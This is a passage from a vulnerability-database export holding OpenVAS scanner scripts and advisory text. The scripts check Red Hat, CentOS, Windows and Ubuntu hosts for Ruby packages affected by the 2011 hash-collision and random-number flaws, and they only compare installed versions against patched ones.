acknowledges Julian W\u00e4lde and Alexander Klink as the original reporters of\n CVE-2011-4815.\n \n All users of ruby are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"ruby on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-January/msg00026.html\");\n script_id(870534);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-01 11:35:50 +0530 (Wed, 01 Feb 2012)\");\n script_cve_id(\"CVE-2011-3009\", \"CVE-2011-4815\", \"CVE-2011-2686\", \"CVE-2011-2705\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2012:0070-01\");\n script_name(\"RedHat Update for ruby RHSA-2012:0070-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of ruby\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-irb\", rpm:\"ruby-irb~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-rdoc\", rpm:\"ruby-rdoc~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-ri\", rpm:\"ruby-ri~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.5~22.el5_7.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-debuginfo\", rpm:\"ruby-debuginfo~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~18.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:08", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for irb CESA-2012:0070 centos4", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705", "CVE-2011-2686", "CVE-2011-4815", "CVE-2011-3009"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881191", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881191", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2012:0070 centos4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-January/018401.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881191\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:39:50 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3009\", \"CVE-2011-4815\", \"CVE-2011-2686\", \"CVE-2011-2705\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0070\");\n script_name(\"CentOS Update for irb CESA-2012:0070 centos4\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'irb'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"irb on CentOS 4\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Ruby is an extensible, interpreted, object-oriented, scripting language. It\n has features to process text files and to do system management tasks.\n\n A denial of service flaw was found in the implementation of associative\n arrays (hashes) in Ruby. An attacker able to supply a large number of\n inputs to a Ruby application (such as HTTP POST request parameters sent to\n a web application) that are used as keys when inserting data into an array\n could trigger multiple hash function collisions, making array operations\n take an excessive amount of CPU time. To mitigate this issue, randomization\n has been added to the hash function to reduce the chance of an attacker\n successfully causing intentional collisions. (CVE-2011-4815)\n\n It was found that Ruby did not reinitialize the PRNG (pseudorandom number\n generator) after forking a child process. This could eventually lead to the\n PRNG returning the same result twice. An attacker keeping track of the\n values returned by one child process could use this flaw to predict the\n values the PRNG would return in other child processes (as long as the\n parent process persisted). (CVE-2011-3009)\n\n Red Hat would like to thank oCERT for reporting CVE-2011-4815. oCERT\n acknowledges Julian W\u00e4lde and Alexander Klink as the original reporters of\n CVE-2011-4815.\n\n All users of ruby are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", rpm:\"irb~1.8.1~18.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.8.1~18.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.8.1~18.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.8.1~18.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.8.1~18.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.8.1~18.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.8.1~18.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-21T22:07:51", "description": "This host is installed with Ruby and is prone to information\n disclosure vulnerability.", "cvss3": {}, "published": "2011-08-29T00:00:00", "type": "openvas", "title": "Ruby Random Number Values Information Disclosure Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310902560", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902560", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby Random Number Values Information Disclosure Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ruby-lang:ruby\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902560\");\n script_version(\"2020-07-14T14:24:25+0000\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:24:25 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-08-29 16:22:41 +0200 (Mon, 29 Aug 2011)\");\n script_cve_id(\"CVE-2011-2705\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Ruby Random Number Values Information Disclosure Vulnerability\");\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=722415\");\n script_xref(name:\"URL\", value:\"http://www.ruby-lang.org/en/news/2011/07/02/ruby-1-8-7-p352-released/\");\n script_xref(name:\"URL\", value:\"http://www.ruby-lang.org/en/news/2011/07/15/ruby-1-9-2-p290-is-released/\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_ruby_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ruby/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"impact\", value:\"Successful exploits may allow attackers to predict random number values.\");\n\n script_tag(name:\"affected\", value:\"Ruby versions before 1.8.7-p352 and 1.9.x before 1.9.2-p290.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists because the SecureRandom.random_bytes function in\n lib/securerandom.rb relies on PID values for initialization, which makes it\n easier for context-dependent attackers to predict the result string by\n leveraging knowledge of random strings obtained in an earlier process with\n the same PID.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby version 1.8.7-p352, 1.9.2-p290 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Ruby and is prone to information\n disclosure vulnerability.\");\n\n script_xref(name:\"URL\", value:\"http://rubyforge.org/frs/?group_id=167\");\n exit(0);\n}\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit(0);\n\nversion = infos['version'];\nlocation = infos['location'];\n\nif( version_in_range( version: version, test_version:\"1.8.7\", test_version2: \"1.8.7.351\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"1.8.7-p352\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"1.9\", test_version2: \"1.9.2.289\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"1.9.2-p290\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-12-21T11:43:23", "description": "This host is installed with Ruby and is prone to information\n disclosure vulnerability.", "cvss3": {}, "published": "2011-08-29T00:00:00", "type": "openvas", "title": "Ruby Random Number Values Information Disclosure Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2705"], "modified": "2017-12-20T00:00:00", "id": "OPENVAS:902560", "href": "http://plugins.openvas.org/nasl.php?oid=902560", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ruby_random_number_values_info_disc_vuln_01.nasl 8196 2017-12-20 12:13:37Z cfischer $\n#\n# Ruby Random Number Values Information Disclosure Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ruby-lang:ruby\";\n\ntag_impact = \"Successful exploits may allow attackers to predict random number values.\n Impact Level: Application\";\ntag_affected = \"Ruby versions before 1.8.7-p352 and 1.9.x before 1.9.2-p290\";\ntag_insight = \"The flaw exists because the SecureRandom.random_bytes function in\n lib/securerandom.rb relies on PID values for initialization, which makes it\n easier for context-dependent attackers to predict the result string by\n leveraging knowledge of random strings obtained in an earlier process with\n the same PID.\";\ntag_solution = \"Upgrade to Ruby version 1.8.7-p352, 1.9.2-p290 or later\n For updates refer to http://rubyforge.org/frs/?group_id=167\";\ntag_summary = \"This host is installed with Ruby and is prone to information\n disclosure vulnerability.\";\n\nif(description)\n{\n script_id(902560);\n script_version(\"$Revision: 8196 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 13:13:37 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-29 16:22:41 +0200 (Mon, 29 Aug 2011)\");\n script_cve_id(\"CVE-2011-2705\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Ruby Random Number Values Information Disclosure Vulnerability\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=722415\");\n script_xref(name : \"URL\" , value : \"http://www.ruby-lang.org/en/news/2011/07/02/ruby-1-8-7-p352-released/\");\n script_xref(name : \"URL\" , value : \"http://www.ruby-lang.org/en/news/2011/07/15/ruby-1-9-2-p290-is-released/\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_ruby_detect_win.nasl\");\n script_mandatory_keys(\"Ruby/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n## Check for Ruby versions before 1.8.7-p352 and 1.9.x before 1.9.2-p290\nif( version_in_range( version:vers, test_version:\"1.8.7\", test_version2:\"1.8.7.p351\" ) ||\n version_in_range( version:vers, test_version:\"1.9\", test_version2:\"1.9.2.p289\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"1.8.7-p352 / 1.9.2-p290\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-12-21T11:43:53", "description": "This host is installed with Ruby and is prone to local denial of\n service vulnerability.", "cvss3": {}, "published": "2011-08-29T00:00:00", "type": "openvas", "title": "Ruby Random Number Generation Local Denial Of Service Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2686"], "modified": "2017-12-20T00:00:00", "id": "OPENVAS:902558", "href": "http://plugins.openvas.org/nasl.php?oid=902558", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ruby_random_number_generation_dos_vuln.nasl 8196 2017-12-20 12:13:37Z cfischer $\n#\n# Ruby Random Number Generation Local Denial Of Service Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ruby-lang:ruby\";\n\ntag_impact = \"Successful exploits may allow local attackers to cause denial-of-service\n conditions.\n Impact Level: Application\";\ntag_affected = \"Ruby Versions prior to 1.8.7-p352\";\ntag_insight = \"The flaw exists because ruby does not reset the random seed upon forking,\n which makes it easier for context-dependent attackers to predict the values\n of random numbers by leveraging knowledge of the number sequence obtained in\n a different child process.\";\ntag_solution = \"Upgrade to Ruby version 1.8.7-p352 or later\n For updates refer to http://rubyforge.org/frs/?group_id=167\";\ntag_summary = \"This host is installed with Ruby and is prone to local denial of\n service vulnerability.\";\n\nif(description)\n{\n script_id(902558);\n script_version(\"$Revision: 8196 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 13:13:37 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-29 16:22:41 +0200 (Mon, 29 Aug 2011)\");\n script_cve_id(\"CVE-2011-2686\");\n script_bugtraq_id(49015);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Ruby Random Number Generation Local Denial Of Service Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/69032\");\n script_xref(name : \"URL\" , value : \"http://redmine.ruby-lang.org/issues/show/4338\");\n script_xref(name : \"URL\" , value : \"http://www.ruby-lang.org/en/news/2011/07/02/ruby-1-8-7-p352-released/\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_ruby_detect_win.nasl\");\n script_mandatory_keys(\"Ruby/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n## Check for Ruby Versions prior to 1.8.7-p352\nif( version_in_range( version:vers, test_version:\"1.8.7\", test_version2:\"1.8.7.p351\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"1.8.7-p352\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-07-21T22:07:05", "description": "This host is installed with Ruby and is prone to local denial of\n service vulnerability.", "cvss3": {}, "published": "2011-08-29T00:00:00", "type": "openvas", "title": "Ruby Random Number Generation Local Denial Of Service Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2686"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310902558", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902558", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby Random Number Generation Local Denial Of Service Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ruby-lang:ruby\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902558\");\n script_version(\"2020-07-14T14:24:25+0000\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:24:25 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-08-29 16:22:41 +0200 (Mon, 29 Aug 2011)\");\n script_cve_id(\"CVE-2011-2686\");\n script_bugtraq_id(49015);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Ruby Random Number Generation Local Denial Of Service Vulnerability\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/69032\");\n script_xref(name:\"URL\", value:\"http://redmine.ruby-lang.org/issues/show/4338\");\n script_xref(name:\"URL\", value:\"http://www.ruby-lang.org/en/news/2011/07/02/ruby-1-8-7-p352-released/\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_ruby_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"ruby/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"impact\", value:\"Successful exploits may allow local attackers to cause denial-of-service\n conditions.\");\n\n script_tag(name:\"affected\", value:\"Ruby Versions prior to 1.8.7-p352.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists because ruby does not reset the random seed upon forking,\n which makes it easier for context-dependent attackers to predict the values\n of random numbers by leveraging knowledge of the number sequence obtained in\n a different child process.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby version 1.8.7-p352 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Ruby and is prone to local denial of\n service vulnerability.\");\n\n script_xref(name:\"URL\", value:\"http://rubyforge.org/frs/?group_id=167\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit(0);\n\nversion = infos['version'];\nlocation = infos['location'];\n\nif( version_in_range( version: version, test_version: \"1.8.7\", test_version2: \"1.8.7.351\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"1.8.7-p352\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:35", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1377-1", "cvss3": {}, "published": "2012-03-07T00:00:00", "type": "openvas", "title": "Ubuntu Update for ruby1.8 USN-1377-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0188", "CVE-2011-2705", "CVE-2011-2686", "CVE-2011-1005", "CVE-2011-1004", "CVE-2010-0541", "CVE-2011-4815"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840923", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840923", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1377_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for ruby1.8 USN-1377-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1377-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840923\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 